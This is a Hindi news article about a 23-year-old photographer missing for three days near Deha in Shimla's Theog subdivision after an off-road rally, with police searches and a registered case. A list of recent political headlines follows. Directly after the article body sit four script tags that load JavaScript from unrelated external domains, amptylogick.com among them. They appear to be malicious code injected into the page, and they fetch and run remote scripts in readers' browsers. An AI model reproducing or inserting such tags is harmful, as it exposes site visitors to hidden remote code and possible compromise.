शिमलाः संदिग्ध परिस्थियों में युवक हुआ लापता, 3 दिन से नहीं मिली कोई खोज़-खबर

<p>राजधानी शिमला के ठियोग उपमंडल के देहा इलाके में एक युवक संदिग्ध परिस्थितियों में लापता हो गया। युवक बीते तीन दिन से लापता है। पुलिस ने क्षेत्र में व्यापक स्तर पर सर्च अभियान चलाया है, लेकिन कोई कामयाबी नहीं मिली। लापता हुए युवक की पहचान रोहड़ू के पुजारली निवासी 23 साल शुभम के रूप में हुई है और वह फोटोग्राफी का काम करता है।</p>

<p>पुलिस द्वारा दी गई जानकारी के मुताबिक शुभम ऑफरोड एक्सपैडिशन की कार रैली में भाग लेकर वापिस आ रहा था कि 30 नवंबर की देर रात्रि देहा के धार नामक स्थान पर अचानक उसकी तबीयत बिगड़ी और वह कार से उतर गया। कार में उसका एक साथी था। बताया गया है कि शुभम काफी देर तक जब कार में वापिस नहीं लौटा, तो उसका साथी घबरा गया और अकेला ही घटनास्थल से जुब्बल आ गया। साथी ने शुभम के परिजनों को मामले की जानकारी दी। परिजनों ने अपने स्तर पर धार और आसपास के इलाकों में शुभम को तलाशा, लेकिन उसका कोई पता नहीं चला। इसके बाद युवक के पिता किशन चंद ने देहा थाना में बेटे की गुमशुदा होने की रिपोर्ट दर्ज करवाई। देहा पुलिस ने मंगलवार को धार जंगल में सर्च अभियान चलाया, मगर कामयाबी नहीं मिली।</p>

<p>ठियोग के डीएसपी कुलबिंद्र सिंह ने पुष्टि करते हुए बताया कि लापता युवक के साथी से पूछताछ की जा रही है, जिसके साथ वह रैली से वापिस आ रहा था। धार के जंगल और आसपास तलाशी अभियान चलाया गया है। अभी तक युवक के बारे में कोई सुराग नहीं मिला है। इस संबंध में आईपीसी 363 के तहत केस दर्ज कर कार्रवाई अमल में लाई जा रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575431157149″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

भाजपा की ताकत उसका कार्यकर्ता है: सौदान

भाजपा राष्ट्रीय उपाध्यक्ष सौदान सिंह ने कांगड़ा लोकसभा क्षेत्र के अंतर्गत ज्वालामुखी विधानसभा की बैठा…

2 hours ago

पूर्व भाजपा विधायक किशोरीलाल कांग्रेस में शामिल

भारतीय जनता पार्टी के पूर्व विधायक किशोरी लाल कांग्रेस में शामिल हो गए. शिमला स्थित…

5 hours ago

हिमाचल प्रदेश हाईकोर्ट ने 27 जजों के तबादले के दिए आदेश

हिमाचल प्रदेश हाईकोर्ट ने डिस्ट्रिक्ट जुड़िशियरी के 27 जजों के तबादला आदेश जारी किए है।…

5 hours ago

कांग्रेस प्रत्याशी आनंद शर्मा ने कालीबाड़ी मंदिर में नवाया शीश

कांग्रेस के वरिष्ठ नेता व कांगड़ा चंबा लोकसभा से कांग्रेस प्रत्याशी आनंद शर्मा ने शिमला…

6 hours ago

जय राम ठाकुर ने विधानसभा में दी भगवान को चुनौती : सीएम

भरमौर (चंबा): चंबा जिले के भरमौर में चुनावी जनसभा को सम्बोधित करते हुए मुख्यमंत्री ठाकुर…

22 hours ago

देशवासी सिर्फ़ नरेन्द्र मोदी को ही प्रधानमंत्री बनाने के लिए उत्सुक है: जयराम ठाकुर

शिमला : नेता प्रतिपक्ष जयराम ठाकुर ने कहा कि भारतवासी  नरेन्द्र मोदी को तीसरी बार…

22 hours ago